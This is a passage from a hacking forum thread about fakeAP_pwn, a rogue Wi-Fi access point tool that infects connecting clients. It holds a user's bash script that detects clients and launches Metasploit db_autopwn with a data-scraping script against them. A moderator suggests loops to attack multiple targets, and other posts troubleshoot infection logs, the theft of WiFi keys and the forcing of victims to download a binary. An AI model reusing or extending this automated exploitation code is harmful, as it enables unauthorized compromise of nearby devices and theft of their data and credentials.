Page 10 of 15 FirstFirst ... 89101112 ... LastLast
Results 91 to 100 of 144

Thread: [Script] [Video] fakeAP_pwn (v0.3)

  1. #91
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Im not a huge fan of autopwn but many like it because its like shooting a machine gun. I'm trying to add a feature to the script to add a remote exploit like spoolss so when it finds a connection it automatically tries the exploit against the attached client. Here is what I have so far.

    Code:
    #!/bin/bash
    echo "#!/bin/bash" >> /tmp/msf.sh
    echo "/pentest/exploits/framework3/msfconsole -r /tmp/own.rc" >> /tmp/msf.sh
    chmod 777 /tmp/msf.sh
    /etc/init.d/postgresql-8.3 start
    sleep 5
    for (( ; ; ))
    do
       arp | grep "at0" | awk '{print $1}' >> /tmp/iplist.lst
       iplist="$(cat /tmp/iplist.lst | awk -v line=1 'NR == line { print $0 }')"
       if [ "$iplist" != "" ] ; then
          echo "db_create /tmp/mynet.db" >> /tmp/own.rc
          echo "db_nmap -sS -F -n $iplist -T3" >> /tmp/own.rc
          echo "setg AutoRunScript scraper" >> /tmp/own.rc
          echo "db_autopwn -t -e -p -r" >> /tmp/own.rc
          xterm -hold -geometry 75x10+10+100 -T "fakeAP_pwn" -e "/tmp/msf.sh" &
          echo "exploiting $iplist"
          ipall="$iplist"
          rm -f /tmp/iplist.lst
          break;
       else
          sleep 10
          echo "Checking..."
       fi
    done
    sleep 20
    #rm -f /tmp/msf.sh
    #rm -f /tmp/own.rc
    #rm -f /tmp/iplist.lst
    I want to loop this so it adds addresses automatically then tries the exploit then ignores the mac once it has a terminal. any suggestions to improve this? I wrote this around of HD Moores ownitall.rc file.
    It works against one target so far.
    Last edited by Scamentology; 11-04-2010 at 04:53 AM.
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

  2. #92
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    WITHOUT testing....Doing a once over on the code, it looks like it doesn't keep a record of which IP's its tested (ipall has it a value, but its not used?)
    Would you also need to loop it for each value of iplist?
    Code:
    for target in ${iplist[@]}" ; do
       echo "Attacking $target"
    done
    I've had a few ideas on how to do this however, I'm away from my lab for the next few weeks - so I'm unable to test anything. )=
    Once fakeAP_pwn v0.4 is out - its main update features should be multiple client support - so it wouldn't be too hard to mod it for your needs
    Have you...g0tmi1k?

  3. #93
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by g0tmi1k View Post
    WITHOUT testing....Doing a once over on the code, it looks like it doesn't keep a record of which IP's its tested (ipall has it a value, but its not used?)
    Would you also need to loop it for each value of iplist?
    I would like it to grab the first ip then attack it then move on to the next but ignore them if they came back up in the list. I dont want to attack the same machine over and over with the same exploit.
    ipall was supposed to be for the next part of the script but with your suggestion is not necessary. Thanks for the tip.

    Code:
    for target in ${iplist[@]}" ; do
       echo "Attacking $target"
    done
    Ahhhh. thanks. thats what I was trying to do. 3 or 4 weeks ago I had never looked inside a script of any sort. so its a learning process. I spent all night reading about looping.

    I've had a few ideas on how to do this however, I'm away from my lab for the next few weeks - so I'm unable to test anything. )=
    Once fakeAP_pwn v0.4 is out - its main update features should be multiple client support - so it wouldn't be too hard to mod it for your needs
    Cant wait!!
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

  4. #94
    Junior Member Liuser's Avatar
    Join Date
    Apr 2010
    Posts
    58

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Script works great - I noticed that you want to incorporate support for OSX in the future. Have you been able to connect to the fake AP using OSX and have the DHCP issue an IP? It is the problem that I am experiencing right now (Windows get IP just fine from DHCP, but OSX does not). I just wanted to verify that this was the main problem you are having right now as I am trying to solve it. Thanks!

  5. #95
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    if you are going to run this script in ubuntu make sure to install the xtightvncviewer package
    a detailed wiki page is soon to come

  6. #96
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by Liuser View Post
    Script works great - I noticed that you want to incorporate support for OSX in the future. Have you been able to connect to the fake AP using OSX and have the DHCP issue an IP? It is the problem that I am experiencing right now (Windows get IP just fine from DHCP, but OSX does not). I just wanted to verify that this was the main problem you are having right now as I am trying to solve it. Thanks!
    Yes yes yes! It's been coded into it since v0.1 I hope to start work on Linux/OSX support for v0.5/v0.6

    I don't have OSX at the mo, so I'm unable to test it out. Funny that windows works, were as OSX doesn't.
    */me wonders what OSX needs that Windows doesn't*
    Can OSX connect to the AP? What happens on the AP and or DHCP window? Are you able to send the log file?



    Quote Originally Posted by joker5bb View Post
    if you are going to run this script in ubuntu make sure to install the xtightvncviewer package
    a detailed wiki page is soon to come
    Thanks for pointing that out about VNC. Just a few things though, doesn't the script not automatically detect/install it? Does it not come out-of-the-box with ubuntu 10.10?
    Have you...g0tmi1k?

  7. #97
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Hi all I wonder if you can help me?

    im running the latest Fakeap 0.3 and all works well but i get the following error when it tries to open the wkv keys this never happened before with earlier versions:

    Keep up the great work tho g0tmilk, the internet reinstate works great too.

    *] fakeAP_pwn v0.3 (#126)
    [>] Analyzing: Environment
    [>] Configuring: Environment
    [>] Creating: Scripts
    [>] Creating: Exploit (Windows)
    [>] Creating: Access point
    [>] Configuring: Network
    [>] Starting: DHCP
    [>] Starting: DNS
    [>] Starting: Exploit
    [>] Starting: Web server
    [i] Waiting for the target to run the "update" file
    [i] Target infected!
    [>] Restoring: Internet access
    [>] Opening: WiFi Keys
    [!] action. Error code: 5 <------------------------------------------(error)
    [>] Restoring: Environment[*] Done! (= Have you... g0tmi1k?
    root@bt:~/FAP_0.3_126#

    Kind Regards Dee

  8. #98
    Member
    Join Date
    Feb 2009
    Location
    0,0
    Posts
    90

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    I had the same error code and it never created the /tmp/ folder where it places the wkv log file. When I ran the script with -d for diagnostics then the folder was created and the log file was there. I can't remember if the script still gave me the error coded though. Maybe give it a try with -d and see what happens.

  9. #99
    Just burned his ISO
    Join Date
    Dec 2009
    Posts
    6

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Hi

    Congratulatios for the awesome tool. I have backtrack 4-Beta running on my VM (attacker system) and a victim laptop with Windows VISTA.

    On the VM I have a alfa card (rtl8187) and I also used a edimax just to make sure it was not the problem, and its not, because I get the same behaivour with both.

    On my VM I dont have internet access, just the fake AP, I dont want to allow internet access (since I dont have it), I just want to force clients to download our binary, thats all.

    I have tested the default configuration and changed a bit, but the problem persist. It setup all stuff and I see client requests, clients associating, and I see MAC address being showed, but very fastly it changes to incomplete.

    On the victim system it connects fine, get all the IP and the gateway with the ip of the attakcer computer (10.0.0.1), but I cant ping or access anything on the attacker computer. Strange enough, when I call arp -a on windows vista I dont see fake AP MAC and I only see network MAC with very strange numbers like a bunch o ff...

    The machines are with state connected, but I cant ping or do anything, there is no connectivity, but I got the DHCP address correctly, etc.

    This is very strange. I tested another laptop as victim and the same happens.

    I called the script with -d and -v and I cant figure why. I posted a copy of the whole log here:

    RAW OUTPUT fsdhjEjK

    Ideas? Suggestions?

    Also, why the WPATARGET that is the network that I want to gain access prob me constantly but never associate?

    Because I have a different essid and bssid?

    Or because the WPATARGET is protected by WAP and mine fake AP is not, and the client will just refuse it?

    Or because my signal is weaker?

    Thanks

  10. #100
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by pentest09 View Post
    Hi all I wonder if you can help me?

    im running the latest Fakeap 0.3 and all works well but i get the following error when it tries to open the wkv keys this never happened before with earlier versions:

    Keep up the great work tho g0tmilk, the internet reinstate works great too.

    *] fakeAP_pwn v0.3 (#126)
    [>] Analyzing: Environment
    [>] Configuring: Environment
    [>] Creating: Scripts
    [>] Creating: Exploit (Windows)
    [>] Creating: Access point
    [>] Configuring: Network
    [>] Starting: DHCP
    [>] Starting: DNS
    [>] Starting: Exploit
    [>] Starting: Web server
    [i] Waiting for the target to run the "update" file
    [i] Target infected!
    [>] Restoring: Internet access
    [>] Opening: WiFi Keys
    [!] action. Error code: 5 <------------------------------------------(error)
    [>] Restoring: Environment[*] Done! (= Have you... g0tmi1k?
    root@bt:~/FAP_0.3_126#

    Kind Regards Dee
    Thanks for reporting this - Ill push an update out later today. (=



    Quote Originally Posted by cseven View Post
    I had the same error code and it never created the /tmp/ folder where it places the wkv log file. When I ran the script with -d for diagnostics then the folder was created and the log file was there. I can't remember if the script still gave me the error coded though. Maybe give it a try with -d and see what happens.
    It now doesn't use /tmp anymore. It SHOULD now create a temp folder in the SAME path as fakeAP_pwn ./tmp/



    Quote Originally Posted by rick.m View Post
    Hi

    Congratulatios for the awesome tool. I have backtrack 4-Beta running on my VM (attacker system) and a victim laptop with Windows VISTA.

    On the VM I have a alfa card (rtl8187) and I also used a edimax just to make sure it was not the problem, and its not, because I get the same behaivour with both.

    On my VM I dont have internet access, just the fake AP, I dont want to allow internet access (since I dont have it), I just want to force clients to download our binary, thats all.

    I have tested the default configuration and changed a bit, but the problem persist. It setup all stuff and I see client requests, clients associating, and I see MAC address being showed, but very fastly it changes to incomplete.

    On the victim system it connects fine, get all the IP and the gateway with the ip of the attakcer computer (10.0.0.1), but I cant ping or access anything on the attacker computer. Strange enough, when I call arp -a on windows vista I dont see fake AP MAC and I only see network MAC with very strange numbers like a bunch o ff...

    The machines are with state connected, but I cant ping or do anything, there is no connectivity, but I got the DHCP address correctly, etc.

    This is very strange. I tested another laptop as victim and the same happens.

    I called the script with -d and -v and I cant figure why. I posted a copy of the whole log here:

    RAW OUTPUT fsdhjEjK

    Ideas? Suggestions?

    Also, why the WPATARGET that is the network that I want to gain access prob me constantly but never associate?

    Because I have a different essid and bssid?

    Or because the WPATARGET is protected by WAP and mine fake AP is not, and the client will just refuse it?

    Or because my signal is weaker?

    Thanks
    Okay, try setting the mode to "non", as you don't want to allow an Internet connection after becoming infected.
    Alot of clients are trying to connect/probing... That might an issue.
    Your also using VM as well as airbase-ng. Both of theses have issues.

    I'm guessing the "arp -a on windows" issue is because of airbase-ng. Not 100% sure mind you.
    Does the target have a gateway IP? DNS?

    I don't understand what you're saying about about "WPATARGET".
    The fakeAP you created was called "Free-WiFi", "WPATARGET" is scanning for networks (hence its probing). [So yes, the ESSID are different?]
    The fakeAP you create is "Open", I have no idea if "WPATARGET" is protected.
    Have you...g0tmi1k?

Page 10 of 15 FirstFirst ... 89101112 ... LastLast

Similar Threads

  1. [Script][Video] EvilGrade (v0.1.1)
    By g0tmi1k in forum BackTrack Videos
    Replies: 27
    Last Post: 03-06-2011, 12:24 PM
  2. [Script] [Video] metasploit-FakeUpdate (v0.1.1)
    By g0tmi1k in forum BackTrack Videos
    Replies: 30
    Last Post: 12-06-2010, 04:53 PM
  3. [Script][Video] - Using McGrew Security's nbnspoof.py
    By orgcandman in forum Beginners Forum
    Replies: 3
    Last Post: 11-17-2010, 07:36 PM
  4. [Script] [Video] FakeAP_pwn (v0.2.1)
    By g0tmi1k in forum BackTrack Videos
    Replies: 184
    Last Post: 09-02-2010, 11:01 AM
  5. Replies: 10
    Last Post: 07-12-2010, 03:04 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •